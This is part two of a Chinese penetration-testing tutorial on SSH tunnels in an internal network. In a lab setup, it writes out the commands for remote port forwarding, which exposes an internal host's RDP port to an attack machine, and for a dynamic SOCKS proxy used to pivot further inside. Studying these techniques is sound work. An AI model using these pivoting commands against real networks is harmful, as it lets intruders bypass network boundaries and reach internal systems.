|关于内网中SSH协议的隧道利用方式( 二 )
本文插图
当连接192.168.3.131的13389端口时 , 通过ssh协议与边界跳板192.168.3.134连接 , 然后10.10.10.130发送相应流量连接至内网10.10.10.128攻击机 随机端口与边界跳板相连接
本文插图
边界跳板 内网随机端口与内网web3389连接
本文插图
内网web 3389端口与边界跳板连接
本文插图
No.4 远程转发
攻击机:192.168.3.131
内网边界:10.10.10.131
内网web:10.10.10.128
这里注意 , 攻击机不能访问内网机器 , 内网边界可访问外网攻击机(可以从内网边界ssh到攻击机上) , 但内网web服务器不能访问攻击机
以内网边界为跳板 , 将192.168.3.131的33389端口流量转发到内网web的3389端口 , 访问33389端口就可以访问内网web的3389的远程桌面
内网边界执行如下命令:
ssh -CfNg -R 33389:10.10.10.128:3389 root@192.168.3.131
33389(攻击机端口) 10.10.10.128(目标主机) 3389(目标端口) 192.168.3.131(攻击机IP)
本文插图
攻击机内如下接入:rdesktop 127.0.0.1:33389
本文插图
攻击机 22端口与内网边界相连接 , 内网出来的流量均会议22端口进行传输
本文插图
内网边界 内网边界是可以访问攻击机的 , 此时边界随机端口将会连接攻击机的22端口
本文插图
内网web 与边界随机端口建立连接
本文插图
No.5 动态转发
攻击机:192.168.3.131
内网边界:192.168.3.134 10.10.10.131
内网web:10.10.10.128
在攻击机上执行如下 , 创建socks代理 , 需要内网边界的密码:
ssh -CfNg -D 60011 root@192.168.3.134
60011(socks代理的端口 , 后期以攻击机的ip与该60011端口接入内网即可)
本文插图
浏览器配置代理 , 接入内网web资源(此次非内网边界):
本文插图
同样可以以此代理地址将其他工具接入内网 , 进一步内网渗透 , 在此不再赘述
本文插图
推荐阅读
- 中年|谈一谈我的十年机械工作经历
- IBM|关于数字化转型与数据应用,你想知道的都在这里!
- APP|合规进行时丨关于 “APP & SDK 合规”你应该知道的那些事(第一弹)
- 青年|《全网公敌》游戏特色内容一览
- 中年|关于新手做自媒体的一些看法
- 域名|全球根域名管理机构主席澄清关于根服务器若干传言
- 行业互联网|互联网新贵歧视指南
- 联华|联华:打出动物保健行业的数字化组合拳
- 中年|关于吉林市龙潭区家家乐超市经销20200307批次不合格蒜蓉辣酱核查处置情况的公示
- 行业互联网|国家工信安全中心领导走访调研ExpressHub
